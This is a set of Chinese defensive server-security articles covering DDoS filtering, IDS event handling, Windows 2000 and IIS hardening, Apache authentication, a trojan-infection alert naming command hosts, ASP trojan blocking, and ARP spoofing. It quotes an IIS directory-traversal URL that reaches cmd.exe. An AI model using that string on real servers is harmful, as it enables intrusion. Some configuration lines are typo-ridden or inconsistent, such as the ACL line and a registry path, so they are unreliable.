服务器安全 防范拒绝服务攻击妙招儿

服务器安全　防范拒绝服务攻击妙招儿

目前网络中有一种攻击让网络管理员最为头疼，那就是拒绝服务攻击，简称DOS和DDOS。它是一种滥用资源性的攻击，目的就是利用自身的资源通过一种放大或不对等的方式来达到消耗对方资源的目的。同一时刻很多不同的IP对服务器进行访问造成服务器的服务失效甚至死机。

今天就笔者公司管理服务器的经验为各位读者介绍几个简单有效的防范拒绝服务攻击的方法，虽然不能彻底防护，但在与DDOS的战斗中可以最大限度降低损失。

1、如何发现攻击

在服务器上可以通过CPU使用率和内存利用率简单有效的查看服务器当前负载情况，如果发现服务器突然超负载运作，性能突然降低，这就有可能是受攻击的征兆。不过也可能是正常访问网站人数增加的原因。如何区分这两种情况呢？按照下面两个原则即可确定受到了攻击。

（1）网站的数据流量突然超出平常的十几倍甚至上百倍，而且同时到达网站的数据包分别来自大量不同的IP。

（2）大量到达的数据包(包括TCP包和UDP包)并不是网站服务连接的一部分，往往指向你机器任意的端口。比如你的网站是Web服务器，而数据包却发向你的FTP端口或其它任意的端口。

2、BAN IP地址法

确定自己受到攻击后就可以使用简单的屏蔽IP的方法将DOS攻击化解。对于DOS攻击来说这种方法非常有效，因为DOS往往来自少量IP地址，而且这些IP地址都是虚构的伪装的。在服务器或路由器上屏蔽攻击者IP后就可以有效的防范DOS的攻击。不过对于DDOS来说则比较麻烦，需要我们对IP地址分析，将真正攻击的IP地址屏蔽。

不论是对付DOS还是DDOS都需要我们在服务器上安装相应的防火墙，然后根据防火墙的日志分析来访者的IP，发现访问量大的异常IP段就可以添加相应的规则到防火墙中实施过滤了。

当然直接在服务器上过滤会耗费服务器的一定系统资源，所以目前比较有效的方法是在服务器上通过防火墙日志定位非法IP段，然后将过滤条目添加到路由器上。例如我们发现进行DDOS攻击的非法IP段为211.153.0.0 255.255.0.0，而服务器的地址为61.153.5.1。那么可以登录公司核心路由器添加如下语句的访问控制列表进行过滤。

cess-list 108 deny tcp 211.153.0.0 0.0.255.255 61.135.5.1 0.0.0.0，

这样就实现了将211.153.0.0 255.255.0.0的非法IP过滤的目的。

小提示：在访问控制列表中表示子网掩码需要使用反向掩码，也就是说0.0.255.255表示子网掩码为255.255.0.0 。

3、增加SYN缓存法

上面提到的BAN IP法虽然可以有效的防止DOS与DDOS的攻击但由于使用了屏蔽IP功能，自然会误将某些正常访问的IP也过滤掉。所以在遇到小型攻击时不建议大家使用上面介绍的BAN IP法。我们可以通过修改SYN缓存的方法防御小型DOS与DDOS的攻击。该方法在笔者所在公司收效显著。

修改SY缓存大小是通过注册表的相关键值完成的。我们将为各位读者介绍在WINDOWS2003和2000中的修改方法。

（1）WIN2003下拒绝访问攻击的防范：

第一步：“开始->运行->输入regedit”进入注册表编辑器。

第二步：找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services，在其下的有个SynAttackProtect键值。默认为0将其修改为1可更有效地防御SYN攻击。

小提示：该参数可使TCP调整SYN-ACKS的重新传输。将SynAttackProtect设置为1时，如果系统检测到存在SYN攻击，连接响应的超时时间将更短。

第三步：将HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下EnableDeadGWDetect键值，将其修改为0。该设置将禁止SYN攻击服务器后强迫服务器修改网关从而使服务暂停。

第四步：将HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下EnablePMTUDiscovery键值，将其修改为0。这样可以限定攻击者的MTU大小，降低服务器总体负荷。

第五步：将HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下KeepAliveTime设置为300,000。将NoNameReleaseOnDemand

设置为1。

（2）WIN2000下拒绝访问攻击的防范：

在WIN2000下拒绝访问攻击的防范方法和2003基本相似，只是在设置数值上有些区别。我们做下简单介绍。

第一步：将SynAttackProtect设置为2。

第二步：将EnableDeadGWDetect设置为0。

第三步：将EnablePMTUDiscovery设置为0。

第四步：将KeepAliveTime设置为300000。

第五步：将NoNameReleaseOnDemand设置为1。

总结：经过上面介绍的察觉攻击法，BAN IP法和最后的修改注册表法可以有效的防范DOS与DDOS的攻击。不过由于DDOS攻击的特点，实际上没有一台服务器能够彻底防范它，即使安装了专业的防范DDOS的硬件防火墙也不能百分之百的避免损失。今天介绍的几个方法只是免费的防范手段，实际中能起到一定的效果。

攻防之道九大入侵检测系统风险及对策

内联网入侵检测系统(以下简称“IDS系统”)能够及时发现一些内联网内的网络病毒、系统漏洞、异常攻击等高风险事件并进行有效处置，从而增强了内联网的安全性，有力地保障了各重要业务系统的正常运行。为了切实加强内联网管理、充分发挥“IDS系统”的作用，下面笔者根据安全监控高风险事件来分析问题、提出对策，以供大家参考。

事件1、Windows 2000/XP RPC服务远程拒绝服务攻击

漏洞存在于Windows系统的DCE-RPC堆栈实现中，远程攻击者可以连接TCP 135端口，发送畸形数据，可导致关闭RPC服务，关闭RPC服务可以引起系统停止对新的RPC请求进行响应，产生拒绝服务。

[对策]

1、临时处理方法:使用防火墙或Windows系统自带的TCP/IP过滤机制对TCP 135端口进行限制，限制外部不可信任主机的连接。

2、彻底解决办法:打安全补丁。

事件2、Windows系统下MSBLAST(冲击波)蠕虫传播

感染蠕虫的计算机试图扫描感染网络上的其他主机，消耗主机本身的资源及大量网络带宽，造成网络访问能力急剧下降。

[对策]

1、下载完补丁后断开网络连接再安装补丁。

2、清除蠕虫病毒。

事件3、Windows系统下Sasser(震荡波)蠕虫传播

蠕虫攻击会在系统上留下后门并可能导致Win 2000/XP操作系统重启，蠕虫传播时可能导致被感染主机系统性能严重下降以及被感染网络带宽被大量占用。

[对策]

1、首先断开计算机网络。

2、然后用专杀工具查杀毒。

3、最后打系统补丁

事件4、TELNET服务用户认证失败

TELNET服务往往是攻击者入侵系统的渠道之一。大多数情况下，合法用户在TELNET登录过程中会认证成功。如果出现用户名或口令无效等情况，TELNET服务器会使认证失败。如果登录用户名为超级用户，则更应引起重视，检查访问来源是否合法。如果短时间内大量出现TELNET认证失败响应，则说明主机可能在遭受暴力猜测攻击。

[对策]

1、检查访问来源的IP、认证用户名及口令是否符合安全策略。

2、密切关注FTP客户端大量失败认证的来源地址的活动，如果觉得有必要，可以暂时禁止此客户端源IP地址的访问。

事件5、TELNET服务用户弱口令认证

攻击者可能利用扫描软件或人工猜测到TELNET服务的弱口令从而非法获得FTP服务的访问，也可能结合TELNET服务器的本地其他漏洞获取主机的控制权。

[对策]

1、提醒或强制相关的TELNET服务用户设置复杂的口令。

2、设置安全策略，定期强制用户更改自己的口令。

事件6、Microsoft SQL 客户端SA用户默认空口令连接

Microsoft SQL数据库默认安装时存在sa用户密码为空的问题，远程攻击者可能利用这个漏洞登录到数据库服务器对数据库进行任意操作。更危险的是由大多数MS-SQL的安装采用集成Windows系统认证的方式，远程攻击者利用空口令登录到SQL服务器后，可以利用MS-SQL的某些转储过程如xp_cmdshell等以LocalSystem的权限在主机上执行任意命令，从而取得主机的完全控制。

[对策]

1、系统的安全模式尽量使用“Windows NT only”模式，这样只有信任的计算机才能连上数据库。

2、为sa账号设置一个强壮的密码;

3、不使用TCP/IP网络协议，改用其他网络协议。

4、如果使用TCP/IP网络协议，最好将其默认端口1433改为其他端口，这样攻击者用扫描器就不容易扫到。

事件7、POP3服务暴力猜测口令攻击

POP3服务是常见网络邮件收取协议。

发现大量的POP3登录失败事件，攻击者可能正在尝试猜测有效的POP3服务用户名和口令，如果成功，攻击者可能利用POP3服务本身漏洞或结合其他服务相关的漏洞进一步侵害系统，也可能读取用户的邮件，造成敏感信息泄露。

[对策]

密切留意攻击来源的进一步活动，如果觉得有必要阻塞其对服务器的连接访问。

事件8、POP3服务接收可疑病毒邮件

当前通过邮件传播的病毒、蠕虫日益流行，其中一些邮件病毒通过发送带有可执行的附件诱使用户点击执行来传播，常见的病毒附件名后缀有:.pif、.scr、.bat、.cmd、.com ，带有这些后缀文件名附件的邮件通常都是伪装成普通邮件的病毒邮件。

邮件病毒感染了主机以后通常会向邮件客户端软件中保存的其他用户邮件地址发送相同的病毒邮件以扩大传染面。

此事件表示IDS检测到接收带可疑病毒附件邮件的操作，邮件的接收者很可能会感染某种邮件病毒，需要立即处理。

[对策]

1、通知隔离检查发送病毒邮件的主机，使用杀毒软件杀除系统上感染的病毒。

2、在邮件服务器上安装病毒邮件过滤软件，在用户接收之前就杀除之。

事件9、Microsoft Windows LSA服务远程缓冲区溢出攻击

Microsoft Windows LSA是本地安全授权服务(LSASRV.DLL)。

LSASS DCE/RPC末端导出的Microsoft活动目录服务存在一个缓冲区溢出，远程攻击者可以利用这个漏洞以SYSTEM权限在系统上执行任意指令。

[对策]

1、临时处理方法:使用防火墙对UDP端口135、137、138、445及TCP端口135、139、445、593进行过滤。

2、打系统补丁、升级。

系统安全之Win2000Server安全配置入门

系统安全之Win2000Server安全配置入门

目前，Windows2000 SERVER是比较流行的服务器操作系统之一，但是要想安全的配置微软的这个操作系统，却不是一件容易的事。本文试图对Windows2000 SERVER的安全配置进行初步的探讨。

一、 定制自己的Windows2000 SERVER

1． 版本的选择：Windows2000有各种语言的版本，对于我们来说，可以选择英文版或简体中文版，我强烈建议：在语言不成为障碍的情况下，请一定使用英文版。要知道，微软的产品是以Bug & Patch而著称的，中文版的Bug远远多于英文版，而补丁一般还会迟至少半个月（也就是说一般微软公布了漏洞后你的机子还会有半个月处于无保护状况）

2． 组件的定制：Windows2000在默认情况下会安装一些常用的组件，但是正是这个默认安装是极度危险的（米特尼科说过，他可以进入任何一台默认安装的服务器，我虽然不敢这么说，不过如果你的主机是Windows2000 SERVER的默认安装，我可以告诉你，你死定了）你应该确切的知道你需要哪些服务，而且仅仅安装你确实需要的服务，根据安全原则，最少的服务+最小的权限=最大的安全。典型的WEB服务器需要的最小组件选择是：只安装IIS的Com Files，IIS Snap-In，WWW Server组件。如果你确实需要安装其他组件，请慎重，特别是：Indexing Service, FrontPage 2000 Server Extensions, Internet Service Manager (HTML)这几个危险服务。

3． 管理应用程序的选择

选择一个好的远程管理软件是非常重要的事，这不仅仅是安全方面的要求，也是应用方面的需要。Windows2000的Terminal Service是基于RDP（远程桌面协议）的远程控制软件，他的速度快，操作方便，比较适合用来进行常规操作。但是，Terminal Service也有其不足之处，由于它使用的是虚拟桌面，再加上微软编程的不严谨，当你使用Terminal Service进行安装软件或重起服务器等与真实桌面交互的操作时，往往会出现哭笑不得的现象，例如：使用Terminal Service重起微软的认证服务器（Compaq, IBM等）可能会直接关机。所以，为了安全起见，我建议你再配备一个远程控制软件作为辅助，和Terminal Service互补，象PcAnyWhere就是一个不错的选择。

二、 正确安装Windows2000 SERVER

1．分区和逻辑盘的分配，有一些朋友为了省事，将硬盘仅仅分为一个逻辑盘，所有的软件都装在C驱上，这是很不好的，建议最少建立两个分区，一个系统分区，一个应用程序分区，这是因为，微软的IIS经常会有泄漏源码/溢出的漏洞，如果把系统和IIS放在同一个驱动器会导致系统文件的泄漏甚至入侵者远程获取ADMIN。推荐的安全配置是建立三个逻辑驱动器，第一个大于2G，用来装系统和重要的日志文件，第二个放IIS，第三个放FTP，这样无论IIS或FTP出了安全漏洞都不会直接影响到系统目录和系统文件。要知道，IIS和FTP是对外服务的，比较容易出问题。而把IIS和FTP分开主要是为了防止入侵者上传程序并从IIS中运行。（这个可能会导致程序开发人员和编辑的苦恼，管他呢，反正你是管理员J）

2．安装顺序的选择：不要觉得：顺序有什么重要？只要安装好了，怎么装都可以的。错！Windows2000在安装中有几个顺序是一定要注意的：

首先，何时接入网络：Windows2000在安装时有一个漏洞，在你输入Administrator密码后，系统就建立了ADMIN$的共享，但是并没有用你刚刚输入的密码来保护它，这种情况一直持续到你再次启动后，在此期间，任何人都可以通过ADMIN$进入你的机器；同时，只要安装一完成，各种服务就会自动运行，而这时的服务器是满身漏洞，非常容易进入的，因此，在完全安装并配置好Windows2000 SERVER之前，一定不要把主机接入网络。

其次，补丁的安装：补丁的安装应该在所有应用程序安装完之后，因为补丁程序往往要替换/修改某些系统文件，如果先安装补丁再安装应用程序有可能导致补丁不能起到应有的效果，例如：IIS的HotFix就要求每次更改IIS的配置都需要安装（变不变态？）

三、 安全配置Windows2000 SERVER

即使正确的安装了Windows2000 SERVER，系统还是有很多的漏洞，还需要进一步进行细致地配置。

1．端口：端口是计算机和外部网络相连的逻辑接口，也是计算机的第一道屏障，端口配置正确与否直接影响到主机的安全

2．IIS：IIS是微软的组件中漏洞最多的一个，平均两三个月就要出一个漏洞，而微软的IIS默认安装又实在不敢恭维，所以IIS的配置是我们的重点，现在大家跟着我一起来：

首先，把C盘那个什么Inetpub目录彻底删掉，在D盘建一个Inetpub（要是你不放心用默认目录名也可以改一个名字，但是自己要记得）在IIS管理器中将主目录指向D:\Inetpub；其次，那个IIS安装时默认的什么scripts等虚拟目录一概删除（罪恶之源呀，忘了http://www.target.com/scripts/..%c1%1c../winnt/system32/cmd.exe了？我们虽然已经把Inetpub从系统盘挪出来了，但是还是小心为上），如果你需要什么权限的目录可以自己慢慢建，需要什么权限开什么。（特别注意写权限和执行程序的权限，没有绝对的必要千万不要给）

3．应用程序配置：在IIS管理器中删除必须之外的任何无用映射，必须指的是ASP, ASA和其他你确实需要用到的文件类型，例如你用到stml等（使用server side include），实际上90%的主机有了上面两个映射就够了，其余的映射几乎每个都有一个凄惨的故事：htw, htr, idq, ida……想知道这些故事？去查以前的漏洞列表吧。什么？找不到在哪里删？在IIS管理器中右击主机->属性->WWW服务 编辑->主目录 配置->应用程序映射，然后就开始一个个删吧（里面没有全选的，嘿嘿）。接着在刚刚那个窗口的应用程序调试书签内将脚本错误消息改为发送文本（除非你想ASP出错的时候用户知道你的程序/网络/数据库结构）错误文本写什么？随便你喜欢，自己看着办。点击确定退出时别忘了让虚拟站点继承你设定的属性。

为了对付日益增多的cgi漏洞扫描器，还有一个小技巧可以参考，在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件，可以让目前绝大多数CGI漏洞扫描器失灵。其实原因很简单，大多数CGI扫描器在编写时为了方便，都是通过查看返回页面的HTTP代码来判断漏洞是否存在的，例如，著名的IDQ漏洞一般都是通过取1.idq来检验，如果返回HTTP200，就认为是有这个漏洞，反之如果返回HTTP404就认为没有，如果你通过URL将HTTP404出错信息重定向到HTTP404.htm文件，那么所有的扫描无论存不存在漏洞都会返回HTTP200，90%的CGI扫描器会认为你什么漏洞都有，结果反而掩盖了你真正的漏洞，让入侵者茫然无处下手（武侠小说中常说全身漏洞反而无懈可击，难道说的就是这个境界？）不过从个人角度来说，我还是认为扎扎实实做好安全设置比这样的小技巧重要的多。

最后，为了保险起见，你可以使用IIS的备份功能，将刚刚的设定全部备份下来，这样就可以随时恢复IIS的安全配置。还有，如果你怕IIS负荷过高导致服务器满负荷死机，也可以在性能中打开CPU限制，例如将IIS的最大CPU使用率限制在70%。

4．账号安全：

Windows2000的账号安全是另一个重点，首先，Windows2000的默认安装允许任何用户通过空用户得到系统所有账号/共享列表，这个本来是为了方便局域网用户共享文件的，但是一个远程用户也可以得到你的用户列表并使用暴力法破解用户密码。很多朋友都知道可以通过更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1来禁止139空连接，实际上Windows2000的本地安全策略（如果是域服务器就是在域服务器安全和域安全策略中）就有这样的选项RestrictAnonymous（匿名连接的额外限制），这个选项有三个值：

0：None. Rely on default permissions（无，取决于默认的权限）

1：Do not allow enumeration of SAM accounts and shares（不允许枚举SAM帐号和共享）

2：No access without explicit anonymous permissions（没有显式匿名权限就不允许访问）

0这个值是系统默认的，什么限制都没有，远程用户可以知道你机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum等等，对服务器来说这样的设置非常危险。

1这个值是只允许非NULL用户存取SAM账号信息和共享信息。

2这个值是在Windows2000中才支持的，需要注意的是，如果你一旦使用了这个值，你的共享估计就全部完蛋了，所以我推荐你还是设为1比较好。

好了，入侵者现在没有办法拿到我们的用户列表，我们的账户安全了……慢着，至少还有一个账户是可以跑密码的，这就是系统内建的administrator，怎么办？我改改改，在计算机管理->用户账号中右击administrator然后改名，改成什么随便你，只要能记得就行了。

不对不对，我都已经改了用户名了，怎么还是有人跑我管理员的密码？幸好我的密码够长，但是这也不是办法呀？嗯，那肯定是在本地或者Terminal Service的登录界面看到的，好吧，我们再来把HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\winlogon项中的Don't Display Last User Name串数据改成1，这样系统不会自动显示上次的登录用户名。

将服务器注册表HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\ WindowsNT\CurrentVersion\Winlogon项中的Don't Display Last User Name串数据修改为1，隐藏上次登陆控制台的用户名。（哇，世界清静了）

5．安全日志：我遇到过这样的情况，一台主机被别人入侵了，系统管理员请我去追查凶手，我登录进去一看：安全日志是空的，倒，请记住：Windows2000的默认安装是不开任何安全审核的！那么请你到本地安全策略->审核策略中打开相应的审核，推荐的审核是：
账户管理 成功 失败

登录事件 成功 失败

对象访问 失败

策略更改 成功 失败

特权使用 失败

系统事件 成功 失败

目录服务访问 失败

账户登录事件 成功 失败

审核项目少的缺点是万一你想看发现没有记录那就一点都没辙；审核项目太多不仅会占用系统资源而且会导致你根本没空去看，这样就失去了审核的意义。

与之相关的是：

在账户策略->密码策略中设定：

密码复杂性要求 启用

密码长度最小值 6位

强制密码历史 5次

最长存留期 30天

在账户策略->账户锁定策略中设定：

账户锁定 3次错误登录

锁定时间 20分钟

复位锁定计数 20分钟

同样，Terminal Service的安全日志默认也是不开的，我们可以在Terminal Service Configration（远程服务配置）-权限-高级中配置安全审核，一般来说只要记录登录、注销事件就可以了。

6.目录和文件权限：

为了控制好服务器上用户的权限，同时也为了预防以后可能的入侵和溢出，我们还必须非常小心地设置目录和文件的访问权限，NT的访问权限分为：读取、写入、读取及执行、修改、列目录、完全控制。在默认的情况下，大多数的文件夹对所有用户（Everyone这个组）是完全敞开的（Full Control），你需要根据应用的需要进行权限重设。

在进行权限控制时，请记住以下几个原则：

(1)、 权限是累计的：如果一个用户同时属于两个组，那么他就有了这两个组所允许的所有权限；

(2)、 拒绝的权限要比允许的权限高（拒绝策略会先执行）如果一个用户属于一个被拒绝访问某个资源的组，那么不管其他的权限设置给他开放了多少权限，他也一定不能访问这个资源。所以请非常小心地使用拒绝，任何一个拒绝；

(3)、 文件权限比文件夹权限高（这个不用解释了吧？）

(4)、 利用用户组来进行权限控制是一个成熟的系统管理员必须具有的优良习惯之一；

(5)、 仅给用户真正需要的权限，权限的最小化原则是安全的重要保障；

(6)、 预防DoS。

在注册表HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters中更改以下值可以帮助你防御一定强度的DoS攻击。

SynAttackProtect REG_DWORD 2

EnablePMTUDiscovery REG_DWORD 0

NoNameReleaseOnDemand REG_DWORD 1

EnableDeadGWDetect REG_DWORD 0

KeepAliveTime REG_DWORD 300,000

PerformRouterDiscovery REG_DWORD 0

EnableICMPRedirects REG_DWORD 0

ICMP攻击：ICMP的风暴攻击和碎片攻击也是NT主机比较头疼的攻击方法，其实应付的方法也很简单，Windows2000自带一个Routing & Remote Access工具，这个工具初具路由器的雏形（微软真是的，什么都要做？听说最近又要做防火墙了）在这个工具中，我们可以轻易的定义输入输出包过滤器，例如，设定输入ICMP代码255丢弃就表示丢弃所有的外来ICMP报文（让你炸？我丢、丢、丢）

四、 需要注意的一些事

实际上，安全和应用在很多时候是矛盾的，因此，你需要在其中找到平衡点，毕竟服务器是给用户用而不是做OPEN HACK的，如果安全原则妨碍了系统应用，那么这个安全原则也不是一个好的原则。

网络安全是一项系统工程，它不仅有空间的跨度，还有时间的跨度。很多朋友（包括部分系统管理员）认为进行了安全配置的主机就是安全的，其实这其中有个误区：我们只能说一台主机在一定的情况一定的时间上是安全的，随着网络结构的变化、新的漏洞的发现，管理员/用户的操作，主机的安全状况是随时随地变化着的，只有让安全意识和安全制度贯穿整个过程才能做到真正的安全。

系统安全之Apache服务器实现用户验证

Apache服务器已经内置用户验证机制，大家只要适当的加以设置，便可以控制网站的某些部分要用户验证。大家只要跟着我一步步做下来就应该能轻松实现用户验证。

前期准备，必须已经安装Apache。

第1步：

我们在/var/www(apache的主页根目录)下建立一个test目录，

mkdir /var/www/test

第2步：

然后我们编辑httpd.conf，添加，

Alias /test"/var/www/test"



Options Indexes MultiViews

AllowOverride AuthConfig #表示进行身份验证

Order allow,deny

Allow from all



AllowOverride AuthConfig 表示进行身份验证，这是关键的设置。

第3步：

在/var/www/test创建.htaccess文件

vi /var/www/test/.htaccess

AuthName "frank share web"

AuthType Basic

AuthUserFile /var/www/test/.htpasswd

require valid-user

#AuthName 描述，随便写

#AuthUserFile /var/www/test/.htpasswd

#require valid-user 或者 require user frank 限制是所有合法用户还是指定用户

密码文件推荐使用.htpasswd，因为apache默认系统对“.ht”开头的文件默认不允许外部读取，安全系数会高一点哦。

第4步：

就是创建apache的验证用户。

htpasswd -c /var/www/test/.thpasswd frank

第一次创建用户要用到-c 参数 第2次添加用户，就不用-c参数。如果你们想修改密码，可以如下

htpasswd -m .htpasswd frank

第5步：

重启Apache服务，然后访问 http://你的网站地址/test 如果顺利的话，应该能看到一个用户验证的弹出窗口，只要填入第4步创建的用户名和密码就行。

后话，为了服务器的性能，一般不推荐使用AllowOverride AuthConfig或者AllowOverride ALL，因为这会使服务器会不断的去寻找.htaccess，从而影响服务器的效能，一般我们把一些后台管理界面或者其他特殊目录可能需要加验证这个需求。

警惕 东方卫士杀毒软件主页被挂马

警惕 东方卫士杀毒软件主页被挂马

太平洋电脑网

作者：DSW Avert

　　今日，DSW Lab Avert小组监测到国内知名安全网站，东方卫士主页被挂木马，在东方卫士主页上，通过查看页面源代码，可以看到网页底部被插入一条“

　　用户被攻击后，会执行一个名为：Trojan-Downloader.Win32.small.kk下载器，该下载器运行后，连接到532.li (IP：60.215.129.100)下载一个木马执行。



被挂马了



看源代码

　　一、木马基本信息：

　　[文件信息]

　　病毒名: Trojan-Downloader.Win32.small.kk

　　大 小: 0x142D (5165), (disk) 0x142D (5165)

　　SHA1 : F76F4E9A21C38432500BD33818ACA2FCBAB5DA16

　　壳信息: 未知

　　危害级别：中

　　病毒名: Backdoor.Win32.Hupigon.dzy

　　大 小: 0x5D200 (381440), (disk) 0x5D200 (381440)

　　SHA1 : FF359B600CE0B1ECF7C4AACBE76EA6264DE1005C

　　壳信息: 未知

　　危害级别：中

　　二、病毒行为：

　　Trojan-Downloader.Win32.small.kk下载了Backdoor.Win32.Hupigon.dzy后，执行该后门，后门文件解析读取lxn2wyf8899.3322.org上面的一个ip.txt文件，根据IP内容，木马反弹连接到攻击者控制主机接受控制。

　　同时两个木马分别添加了注册表启动项目和系统服务：

　　键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

　　键名：wdfmgr32

　　键值："C:WINDOWS\system32\wdfmgr32.exe"

　　系统服务名称：Net work nois

　　显示名称：Net work nois

　　服务描述：Net work nois

　　对应文件路径：C:\windows\svchost.exe

　　三、解决方案：

　　1、推荐安装超级巡警监测查杀以上木马。

　　2、请广大用户及时升级系统补丁，预防更多的VML漏洞攻击。

　　3、为了最快保障广大用户不受木马侵害，在事件解决前请暂时不要访问东方卫士网站。

防止ASP木马在服务器上运行

如果您的服务器正在受ASP木马的困扰，那么希望这篇文章能帮您解决您所面临的问题。

目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作。

一、使用FileSystemObject组件

FileSystemObject可以对文件进行常规操作，可以通过修改注册表，将此组件改名，来防止此类木马的危害。

把HKEY_CLASSES_ROOT/Scripting.FileSystemObject/改名为其它的名字，如：改为FileSystemObject_ChangeName 。自己以后调用的时候使用这个就可以正常调用此组件了。

也要将clsid值也改一下，HKEY_CLASSES_ROOT/Scripting.FileSystemObject/CLSID/项目的值也可以将其删除，来防止此类木马的危害。

注销此组件命令：

RegSvr32 /u C:/WINNT/SYSTEM32/scrrun.dll

禁止Guest用户使用scrrun.dll来防止调用此组件。

使用命令：

cacls C:/WINNT/system32/scrrun.dll /e /d guests

二、使用WScript.Shell组件

WScript.Shell可以调用系统内核运行DOS基本命令，可以通过修改注册表，将此组件改名，来防止此类木马的危害。

HKEY_CLASSES_ROOT/WScript.Shell/及HKEY_CLASSES_ROOT/WScript.Shell.1/改名为其它的名字，如：改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName。自己以后调用的时候使用这个就可以正常调用此组件了，也要将clsid值也改一下。

HKEY_CLASSES_ROOT/WScript.Shell/CLSID/项目的值

HKEY_CLASSES_ROOT/WScript.Shell.1/CLSID/项目的值

也可以将其删除，来防止此类木马的危害。

三、使用Shell.Application组件

Shell.Application可以调用系统内核运行DOS基本命令，可以通过修改注册表，将此组件改名，来防止此类木马的危害。

HKEY_CLASSES_ROOT/Shell.Application/

及HKEY_CLASSES_ROOT/Shell.Application.1/

改名为其它的名字，如：改为Shell.Application_ChangeName或Shell.Application.1_ChangeName。自己以后调用的时候使用这个就可以正常调用此组件了，也要将clsid值也改一下：

HKEY_CLASSES_ROOT/Shell.Application/CLSID/项目的值

HKEY_CLASSES_ROOT/Shell.Application/CLSID/项目的值

也可以将其删除，来防止此类木马的危害。

禁止Guest用户使用shell32.dll来防止调用此组件。

使用命令：

cacls C:/WINNT/system32/shell32.dll /e /d guests

注：操作均需要重新启动WEB服务后才会生效。

四、调用Cmd.exe

禁用Guests组用户调用cmd.exe，

cacls C:/WINNT/system32/Cmd.exe /e /d guests

通过以上四步的设置基本可以防范目前比较流行的几种木马，但最有效的办法还是通过综合安全设置，将服务器、程序安全都达到一定标准，才可能将安全等级设置较高，防范更多非法入侵。

ASP网站漏洞解析及黑客入侵防范方法

如何更好的达到防范黑客攻击，本人提一下个人意见!第一，免费程序不要真的就免费用，既然你可以共享原码，那么攻击者一样可以分析代码。如果在细节上注意防范，那样你站点的安全性就大大的提高了。即使出现了SQL Injection这样的漏洞，攻击者也不可能马上拿下你的站点。

由于ASP的方便易用，越来越多的网站后台程序都使用ASP脚本语言。但是， 由于ASP本身存在一些安全漏洞，稍不小心就会给黑客提供可乘之机。事实上，安全不仅是网管的事，编程人员也必须在某些安全细节上注意，养成良好的安全习惯，否则会给自己的网站带来巨大的安全隐患。目前，大多数网站上的ASP程序有这样那样的安全漏洞，但如果编写程序的时候注意一点的话，还是可以避免的。

1、用户名与口令被破解

攻击原理：用户名与口令，往往是黑客们最感兴趣的东西，如果被通过某种方式看到源代码，后果是严重的。

防范技巧：涉及用户名与口令的程序最好封装在服务器端，尽量少在ASP文件里出现，涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接，在理想状态下只给它以执行存储过程的权限，千万不要直接给予该用户修改、插入、删除记录的权限。

2、验证被绕过

攻击原：现在需要经过验证的ASP程序大多是在页面头部加一个判断语句，但这还不够，有可能被黑客绕过验证直接进入。

防范技巧：需要经过验证的ASP页面，可跟踪上一个页面的文件名，只有从上一页面转进来的会话才能读取这个页面。

3、Inc文件泄露问题

攻击原理：当存在ASP的主页正在制作且没有进行最后调试完成以前，可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页进行查找，会得到有关文件的定位，并能在浏览器中查看到数据库地点和结构的细节，并以此揭示完整的源代码。

防范技巧：程序员应该在网页发布前对它进行彻底的调试;安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密，其次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测到的名称，尽量使用无规则的英文字母。

如何预防和处理ARP攻击病毒

1 前言：病毒原理和行为说明

2 预防在先，重要的规避措施

3 第一步，监控攻击行为和源头

2.1. 第三方IDS或者有IDS功能的防火墙

2.2. 第三方工具

2.3. 趋势OfficeScan客户端防火墙

4 第二步，恢复网络

5 第三步，分析并提取ARP攻击源可疑样本

1 前言：病毒原理和行为说明

此类病毒利用的是ARP Spoofing攻击原理。在局域网中，是通过ARP协议来完成IP地址转换为第二层物理地址（即MAC地址）的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞或者实现“man in the middle” 进行ARP重定向和嗅探攻击。

用伪造源MAC地址发送ARP响应包，对ARP高速缓存机制的攻击。

每个主机都用一个ARP高速缓存存放最近IP地址到MAC硬件地址之间的映射记录。MS Windows高速缓存中的每一条记录（条目）的生存时间一般为60秒，起始时间从被创建时开始算起。

默认情况下，ARP从缓存中读取IP-MAC条目，缓存中的IP-MAC条目是根据ARP响应包动态变化的。因此，只要网络上有ARP响应包发送到本机，即会更新ARP高速缓存中的IP-MAC条目。

攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

ARP协议并不只在发送了ARP请求才接收ARP应答。当计算机接收到ARP应答数据包的时候，就会对本地的ARP缓存进行更新，将应答中的IP和MAC地址存储在ARP缓存中。因此，B向A发送一个自己伪造的ARP应答，而这个应答中的数据为发送方IP地址是192.168.10.3（C的IP地址），MAC地址是DD-DD-DD-DD-DD-DD（C的MAC地址本来应该是CC-CC-CC-CC-CC-CC，这里被伪造了）。当A接收到B伪造的ARP应答，就会更新本地的ARP缓存（A可不知道被伪造了）。

当攻击源大量向局域网中发送虚假的ARP信息后，就会造成局域网中的机器ARP缓存的崩溃。

